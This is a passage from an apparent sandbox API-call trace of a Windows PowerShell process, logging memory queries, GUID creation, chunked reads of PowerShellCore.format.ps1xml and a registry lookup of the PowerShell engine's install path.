	[0349.980] VirtualQuery (in: lpAddress=0xcb890, lpBuffer=0xcc750, dwLength=0x30 | out: lpBuffer=0xcc750*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.981] VirtualQuery (in: lpAddress=0xcb920, lpBuffer=0xcc7e0, dwLength=0x30 | out: lpBuffer=0xcc7e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.981] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x4bd3ba92, Data2=0xd561, Data3=0x462b, Data4=([0]=0xa0, [1]=0x56, [2]=0x58, [3]=0xef, [4]=0x49, [5]=0x63, [6]=0xdc, [7]=0xcc))) returned 0x0
	[0349.981] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x41546acf, Data2=0x3f0d, Data3=0x4f12, Data4=([0]=0xb9, [1]=0xb2, [2]=0x10, [3]=0xe2, [4]=0x6c, [5]=0xd1, [6]=0xfe, [7]=0x2))) returned 0x0
	[0349.981] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x13b405be, Data2=0xee9e, Data3=0x41bd, Data4=([0]=0x92, [1]=0xb7, [2]=0xf0, [3]=0x9b, [4]=0xd2, [5]=0xb, [6]=0x67, [7]=0x13))) returned 0x0
	[0349.981] SetErrorMode (uMode=0x1) returned 0x1
	[0349.981] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0349.981] GetFileType (hFile=0x334) returned 0x1
	[0349.982] SetErrorMode (uMode=0x1) returned 0x1
	[0349.982] GetFileType (hFile=0x334) returned 0x1
	[0349.982] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.982] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.982] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.982] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.982] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.982] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.983] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.983] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.983] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.983] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.983] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.983] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.984] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.984] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.984] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.984] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.984] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.985] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.985] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.985] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.985] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.985] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0xe67, lpOverlapped=0x0) returned 1
	[0349.985] ReadFile (in: hFile=0x334, lpBuffer=0x2e61b77, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e61b77*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0349.985] ReadFile (in: hFile=0x334, lpBuffer=0x2e625a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x2e625a8*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0349.986] SetErrorMode (uMode=0x1) returned 0x1
	[0349.986] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0349.986] SetErrorMode (uMode=0x1) returned 0x1
	[0349.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0349.986] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd108 | out: phkResult=0xcd108*=0x334) returned 0x0
	[0349.986] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd08c, lpData=0x0, lpcbData=0xcd088*=0x0 | out: lpType=0xcd08c*=0x1, lpData=0x0, lpcbData=0xcd088*=0x56) returned 0x0
	[0349.986] CoTaskMemAlloc (cb=0x5a) returned 0x37db50
	[0349.986] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd05c, lpData=0x37db50, lpcbData=0xcd058*=0x56 | out: lpType=0xcd05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd058*=0x56) returned 0x0
	[0349.986] CoTaskMemFree (pv=0x37db50) 
	[0349.986] RegCloseKey (hKey=0x334) returned 0x0
	[0349.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0349.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0349.988] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x88a08dd6, Data2=0x3b65, Data3=0x4d5e, Data4=([0]=0x80, [1]=0x2, [2]=0xf6, [3]=0x18, [4]=0x6, [5]=0xf, [6]=0xb5, [7]=0xbd))) returned 0x0
	[0349.988] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x1c82dc73, Data2=0xb246, Data3=0x4e16, Data4=([0]=0x85, [1]=0xcd, [2]=0x8, [3]=0x26, [4]=0xfa, [5]=0xcb, [6]=0xa9, [7]=0xce))) returned 0x0
	[0349.989] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xbdc6e25e, Data2=0x925f, Data3=0x42ba, Data4=([0]=0xa2, [1]=0x14, [2]=0xe1, [3]=0x1d, [4]=0xb6, [5]=0x65, [6]=0xe5, [7]=0x1f))) returned 0x0
	[0349.989] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xe22e8f8e, Data2=0x44ef, Data3=0x4275, Data4=([0]=0xa1, [1]=0xa5, [2]=0xec, [3]=0x53, [4]=0xcc, [5]=0xbe, [6]=0xcf, [7]=0xe5))) returned 0x0
	[0350.317] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x5afb9d14, Data2=0xecb4, Data3=0x48cd, Data4=([0]=0xad, [1]=0xdc, [2]=0x20, [3]=0x60, [4]=0x83, [5]=0xc5, [6]=0xcc, [7]=0x6f))) returned 0x0
	[0350.317] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x24750b19, Data2=0xa234, Data3=0x4737, Data4=([0]=0x81, [1]=0x46, [2]=0xa2, [3]=0xc6, [4]=0x6a, [5]=0x2e, [6]=0x37, [7]=0xbe))) returned 0x0
	[0350.317] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x725bb384, Data2=0x4bfd, Data3=0x4ca5, Data4=([0]=0xa1, [1]=0x28, [2]=0xa5, [3]=0x46, [4]=0xa4, [5]=0xa8, [6]=0x3d, [7]=0xe1))) returned 0x0
	[0350.317] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.319] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x5a8c2a89, Data2=0xb585, Data3=0x4ef9, Data4=([0]=0x95, [1]=0xb0, [2]=0xdd, [3]=0xca, [4]=0x9c, [5]=0xee, [6]=0x8b, [7]=0x2))) returned 0x0
	[0350.319] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x777fad65, Data2=0x5919, Data3=0x4762, Data4=([0]=0xb8, [1]=0x14, [2]=0x76, [3]=0x96, [4]=0x9c, [5]=0xfb, [6]=0xf1, [7]=0xb4))) returned 0x0
	[0350.319] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x5c5af6c1, Data2=0xdd21, Data3=0x4d60, Data4=([0]=0xbf, [1]=0x92, [2]=0xb3, [3]=0x3c, [4]=0x29, [5]=0xc6, [6]=0x43, [7]=0xb6))) returned 0x0
	[0350.319] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xef8ab343, Data2=0xa097, Data3=0x47e4, Data4=([0]=0x84, [1]=0x38, [2]=0xc, [3]=0x8a, [4]=0xf4, [5]=0x37, [6]=0x97, [7]=0xe))) returned 0x0
	[0350.319] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xac4db228, Data2=0x6a63, Data3=0x4832, Data4=([0]=0x9d, [1]=0x70, [2]=0x71, [3]=0x94, [4]=0xa1, [5]=0x48, [6]=0x72, [7]=0x14))) returned 0x0
	[0350.319] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xbf20be23, Data2=0xae34, Data3=0x48c5, Data4=([0]=0x8b, [1]=0xbd, [2]=0xa2, [3]=0x2f, [4]=0xa5, [5]=0x8, [6]=0xd4, [7]=0xe4))) returned 0x0
	[0350.320] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xfc0fd47f, Data2=0xc939, Data3=0x41b9, Data4=([0]=0xad, [1]=0x46, [2]=0x73, [3]=0x66, [4]=0x23, [5]=0x33, [6]=0xba, [7]=0xe6))) returned 0x0
	[0350.320] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa55addec, Data2=0x742c, Data3=0x425f, Data4=([0]=0xa6, [1]=0x2d, [2]=0x49, [3]=0x8, [4]=0x3d, [5]=0xcd, [6]=0x5d, [7]=0x72))) returned 0x0
	[0350.320] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x4f27fcfd, Data2=0xa80b, Data3=0x4251, Data4=([0]=0xb3, [1]=0x2c, [2]=0x56, [3]=0x5c, [4]=0x8, [5]=0x20, [6]=0xa4, [7]=0xa))) returned 0x0
	[0350.320] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xcd93ab28, Data2=0xeb3a, Data3=0x4531, Data4=([0]=0xa7, [1]=0x11, [2]=0xf6, [3]=0xfd, [4]=0xe4, [5]=0xb3, [6]=0xfb, [7]=0x2e))) returned 0x0
	[0350.320] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa1cf3308, Data2=0xcdcf, Data3=0x46da, Data4=([0]=0x8e, [1]=0x22, [2]=0xc1, [3]=0x95, [4]=0xcd, [5]=0xf4, [6]=0x4a, [7]=0x24))) returned 0x0
	[0350.320] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x997c7d8c, Data2=0x65c6, Data3=0x49b8, Data4=([0]=0x99, [1]=0xf9, [2]=0x9d, [3]=0x39, [4]=0xb5, [5]=0xf4, [6]=0xd1, [7]=0xbf))) returned 0x0
	[0350.320] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.322] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.324] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.324] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa292ad88, Data2=0x68b0, Data3=0x46b3, Data4=([0]=0x99, [1]=0x9b, [2]=0xf3, [3]=0x3c, [4]=0x83, [5]=0x66, [6]=0xf8, [7]=0x28))) returned 0x0
	[0350.325] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x68f1faeb, Data2=0xaa5a, Data3=0x4150, Data4=([0]=0xb3, [1]=0xed, [2]=0x54, [3]=0xed, [4]=0xac, [5]=0xfc, [6]=0x1a, [7]=0x4f))) returned 0x0
	[0350.325] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x67bfeea8, Data2=0x90f0, Data3=0x4eb7, Data4=([0]=0xb9, [1]=0xe3, [2]=0x27, [3]=0x4e, [4]=0x4, [5]=0x6b, [6]=0x22, [7]=0xda))) returned 0x0
	[0350.325] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x530974b4, Data2=0xc7ab, Data3=0x403e, Data4=([0]=0x82, [1]=0x9, [2]=0xf9, [3]=0x30, [4]=0x64, [5]=0x66, [6]=0xcd, [7]=0x5d))) returned 0x0
	[0350.325] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x1a03332b, Data2=0x434d, Data3=0x4278, Data4=([0]=0x93, [1]=0xe4, [2]=0x32, [3]=0xdb, [4]=0x87, [5]=0x0, [6]=0x5, [7]=0x8a))) returned 0x0
	[0350.325] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x2a79e106, Data2=0x5496, Data3=0x42a8, Data4=([0]=0x8b, [1]=0xfa, [2]=0x2d, [3]=0x2d, [4]=0x65, [5]=0xc9, [6]=0x13, [7]=0x56))) returned 0x0
	[0350.325] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x14bf921, Data2=0x3eb3, Data3=0x4cb1, Data4=([0]=0xa1, [1]=0x62, [2]=0x89, [3]=0x36, [4]=0x8f, [5]=0xb0, [6]=0x68, [7]=0xda))) returned 0x0
	[0350.325] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x2639c92, Data2=0x3d20, Data3=0x4274, Data4=([0]=0x82, [1]=0xee, [2]=0x75, [3]=0x9f, [4]=0xdf, [5]=0xe7, [6]=0xa9, [7]=0xc1))) returned 0x0
	[0350.325] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xa93d57f5, Data2=0xee0, Data3=0x4f5e, Data4=([0]=0x86, [1]=0xf8, [2]=0xd8, [3]=0x92, [4]=0x9c, [5]=0xa4, [6]=0xdc, [7]=0xd7))) returned 0x0
	[0350.325] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xd55bb056, Data2=0xf245, Data3=0x4274, Data4=([0]=0x89, [1]=0x23, [2]=0xad, [3]=0xa5, [4]=0x23, [5]=0x3e, [6]=0x16, [7]=0x61))) returned 0x0
	[0350.325] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x43180ae0, Data2=0x1b55, Data3=0x4354, Data4=([0]=0xb5, [1]=0x14, [2]=0x63, [3]=0x4e, [4]=0x96, [5]=0xba, [6]=0xf3, [7]=0x59))) returned 0x0
	[0350.326] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xb67f56d3, Data2=0x9296, Data3=0x4ca9, Data4=([0]=0xbb, [1]=0xc5, [2]=0x9a, [3]=0xc7, [4]=0xcf, [5]=0xe3, [6]=0x98, [7]=0xab))) returned 0x0
	[0350.326] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xf5a2c3ed, Data2=0xb8e2, Data3=0x4499, Data4=([0]=0x8d, [1]=0x19, [2]=0x16, [3]=0xfe, [4]=0x1f, [5]=0x28, [6]=0xef, [7]=0xf9))) returned 0x0
	[0350.326] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.326] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x4b12975b, Data2=0x76ff, Data3=0x4ccf, Data4=([0]=0xbb, [1]=0x50, [2]=0x2, [3]=0x5d, [4]=0x4b, [5]=0x5f, [6]=0xcf, [7]=0xb8))) returned 0x0
	[0350.326] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.327] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.327] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x9ee14311, Data2=0xcf13, Data3=0x440b, Data4=([0]=0xa9, [1]=0x26, [2]=0x87, [3]=0x6f, [4]=0xc, [5]=0x8e, [6]=0xe3, [7]=0x5))) returned 0x0
	[0350.327] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.327] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x60c685e7, Data2=0x99cc, Data3=0x43e2, Data4=([0]=0x8e, [1]=0x26, [2]=0xbd, [3]=0xd8, [4]=0x16, [5]=0x64, [6]=0xb5, [7]=0x4f))) returned 0x0
	[0350.328] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x52b73c36, Data2=0x8d44, Data3=0x4729, Data4=([0]=0xaa, [1]=0x3e, [2]=0xc2, [3]=0x16, [4]=0xbc, [5]=0x30, [6]=0x90, [7]=0x62))) returned 0x0
	[0350.328] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xdab8846a, Data2=0xf775, Data3=0x4d38, Data4=([0]=0x8b, [1]=0x48, [2]=0xe2, [3]=0x5c, [4]=0xf5, [5]=0x96, [6]=0xfc, [7]=0x61))) returned 0x0
	[0350.328] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x2b230466, Data2=0xd7a0, Data3=0x414e, Data4=([0]=0xa0, [1]=0xaf, [2]=0x86, [3]=0x93, [4]=0x14, [5]=0x94, [6]=0xbc, [7]=0x12))) returned 0x0
	[0350.328] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x86bf5e35, Data2=0xccbd, Data3=0x413b, Data4=([0]=0xb2, [1]=0x28, [2]=0x52, [3]=0x5c, [4]=0xd8, [5]=0x11, [6]=0x1, [7]=0x3e))) returned 0x0
	[0350.328] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x7d35d314, Data2=0xf25a, Data3=0x4cc7, Data4=([0]=0x8c, [1]=0xa6, [2]=0x48, [3]=0x37, [4]=0x1c, [5]=0xe0, [6]=0x8e, [7]=0xa0))) returned 0x0
	[0350.328] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x8f453971, Data2=0x35f8, Data3=0x42a7, Data4=([0]=0x9d, [1]=0x98, [2]=0xe2, [3]=0x83, [4]=0x45, [5]=0x15, [6]=0xed, [7]=0x2))) returned 0x0
	[0350.328] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.328] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x78461e66, Data2=0xa329, Data3=0x4746, Data4=([0]=0xa0, [1]=0xdd, [2]=0x5f, [3]=0xb8, [4]=0xc7, [5]=0xf, [6]=0x42, [7]=0x83))) returned 0x0
	[0350.328] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x82b56849, Data2=0x4e04, Data3=0x44da, Data4=([0]=0xb1, [1]=0x8a, [2]=0x14, [3]=0xf0, [4]=0xde, [5]=0x16, [6]=0xc6, [7]=0xb0))) returned 0x0
	[0350.329] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xe91817f6, Data2=0xd76, Data3=0x4345, Data4=([0]=0xb3, [1]=0xc7, [2]=0x5, [3]=0x97, [4]=0xdb, [5]=0x89, [6]=0x90, [7]=0x7a))) returned 0x0
	[0350.329] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xe6fb1908, Data2=0x6004, Data3=0x4daf, Data4=([0]=0xbc, [1]=0x54, [2]=0x43, [3]=0x97, [4]=0x76, [5]=0xe0, [6]=0xb, [7]=0x25))) returned 0x0
	[0350.329] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x74c305f, Data2=0xde51, Data3=0x445f, Data4=([0]=0x8c, [1]=0x9b, [2]=0xbc, [3]=0x74, [4]=0xbe, [5]=0xe0, [6]=0xed, [7]=0xcc))) returned 0x0
	[0350.329] VirtualQuery (in: lpAddress=0xcbce0, lpBuffer=0xccba0, dwLength=0x30 | out: lpBuffer=0xccba0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
